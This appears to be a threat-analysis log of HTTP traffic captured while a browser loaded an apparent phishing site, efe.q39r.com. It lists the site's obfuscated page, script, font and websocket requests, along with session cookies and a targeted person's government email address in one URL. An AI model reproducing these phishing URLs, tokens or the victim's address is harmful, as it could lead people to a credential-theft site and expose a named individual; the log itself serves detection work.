Source: global traffic HTTP traffic detected: GET /mxd88J5SFObXj8HgS9r5Oqo HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ill6Vk4yM2d2SFgrZmtnb0grbkxnM3c9PSIsInZhbHVlIjoiWXhsVHZNTjJGQVMxekE5VWJPV2N1VTNjT3FxS2dodmlxRzdPYTAxRFBaOVVOSXFPV3hqVGFnM1NGUDlIUEFmOTZaNXhMd2tLdUhHSi9tVXovZU16UVBEMWRCYWVHMkQzV0NQRFlLZlJ6YzJ4dm0vS2wzU1E0TWowRG9sbStPemEiLCJtYWMiOiI3MWYwZTcwNzQ2ZDQ4NjUzYTIzY2VjYzVlYzliOWQ2NzQ0MGZmNTg5MGFiZDRkYzkzMDlhMzU4ZGUzYjViYmY3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVGZklxQytncTdnV1Y3SnRCQlJWVWc9PSIsInZhbHVlIjoiT3JkN2FXQ1dqcU14OCtmUWdSZzRuZW1MeXpwU0JDNjBzbTVMbDFBZS90Qis2ODZRWkN1bFFGT0JrTzFNbjhnUGllcmdTNzBZYXdXeVl4czJuTXhhWjZtMHRxeTdqclNRZHpHc0JISFFtZkQzWWt4Z2x0Wk85TFlsaVdxTHBQanEiLCJtYWMiOiI3NGU1Mzk0NjBkZTAwMzYxNWM1M2U1OGZiNmJkYTE4NTM4ZjkwZmUzZWJjZTgyMGY4NjZhNjUxMTVlNWNhNzkyIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /efe/?fXmaria.wojciechowski@co.monmouth.nj.us HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://efe.q39r.com/efe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdCeXNHYVpPQlo2M2JnQXEzZWMrSFE9PSIsInZhbHVlIjoiUFZFL21GcjdLa2xpQ2lBbkV0SWlTVldjWER2S1lVL0hpUXUyTTI0aTVGZGZZMmdwWThZbklGdTJEMGpwdmZBS2ZuNWdnSS9WYnFRVDlpcXJxa3lJZ2VjMzVMcVNabnZFODdRRDluUlZWSk9KcHVuejFHdFBvZldWL0JvT2E2WXoiLCJtYWMiOiI0YTkzZmZkNmIzZjAxMmJjMDJmZjE0YzY5MTJhNGYwNGU5MzRjN2Y4ZWMyYzlmZDE3MGRjMjAyMzFmMTQ0NmJmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilg5amVmVWdaWTdxMDNXWHZIV2M1OHc9PSIsInZhbHVlIjoiNXkwU0g0UHp1Q0pJNjU2UTFBRi85NU1iTElBVHR4SDNjOFQ1K2pIclFRK3g1RkxidlBTeFYzVVp0STN0elhiRkdIQkNYYzRCSlliQkJnSUcwZktLSHBTSkk1MDVLM05vOStnWDZTYVhqVXNxU2RWSHR2Z3NXYmcrcDJobDZVM0MiLCJtYWMiOiIwZDc5OTJlZmUwNjNmMjg0ODcwN2U1MTVmMTcxMzAyMDgzOTYwMGE4ZWM0M2IwMGYxOGIwNGYxYTVjYzA4NWVmIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQ HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://efe.q39r.com/efe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InIzYWcwZnV5OUQ0c1MxVUNjSk9qSnc9PSIsInZhbHVlIjoiSFh3NWpMY2ExU1VFbHFxZlB3cDdCOHVoaGRBTUlIZDVXd3pZQUp0aml0UjFyejFNWkxzdm5uY1lPQ0ZRT21ySTZGUTFFdFhBWFNBWWZUeDhQNHRZOXhrM0ViaTNNbmV2ck5LMURCWUtFL1JrdjVSd0lpZzdxQU5PZjd1WXI1VkYiLCJtYWMiOiI5NTU0ZjRiNzAxY2NmNTU4NjdjYzIwMzkyNGIwODJiMTI0OTZmNmIyNDI3ZTA5ZGJiMzZiMmY5NDc1OWUxNDRlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjR1cHRINzJaKzlZNkM5akJsdE01RFE9PSIsInZhbHVlIjoibDNJY2Rway9ETEw0ZzMzeUEwenVIN24zSFp0bVowVGxmdmhhQmF5SERpd1FwcHNZc0pkS0UzUnV6R2I2U0cyUVJoNG9Fc3E3RHhXRUgxbUIyY2FaQWsxZVpqSzVqcXlPQ3p3VWhHbUhPWUU3Wjc0a3VkK2o5RzF4aFU0Tm1VNFQiLCJtYWMiOiI3NzViZjE0ODQ1YTU5NThjODliMWUyNTg1MTAxMGMyYjE1MDczOTYxYTkyNWU4ZjkyNmFjNGMzNTAwNWIwNTRmIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /12deHT1xywXm8915 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /xyVJM3U7MOm9vvpqo9Yqgh30 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /rscAVjDySGVa9dH78yzE7duv38 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzsbPpRgtDS56O6DQfqr50 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /78YLTTRnUphmEbu9qO67SLVo5st60 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /234cS6u1hDGFEEM8d4zs89TYj5mkaHvw70 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /89gLF9wAyZQBttvEu1214qTO8Jk0zab80 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3DSec-WebSocket-Key: vG7Nn7q0EPX8RKA9bTUTUg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic HTTP traffic detected: GET /efIkwX88PctuuCqm8UQNdlk78EKul19lCmn100 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /34UJHa98hExprCv4yLNkGMHklIZuYOiDcK7889105 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 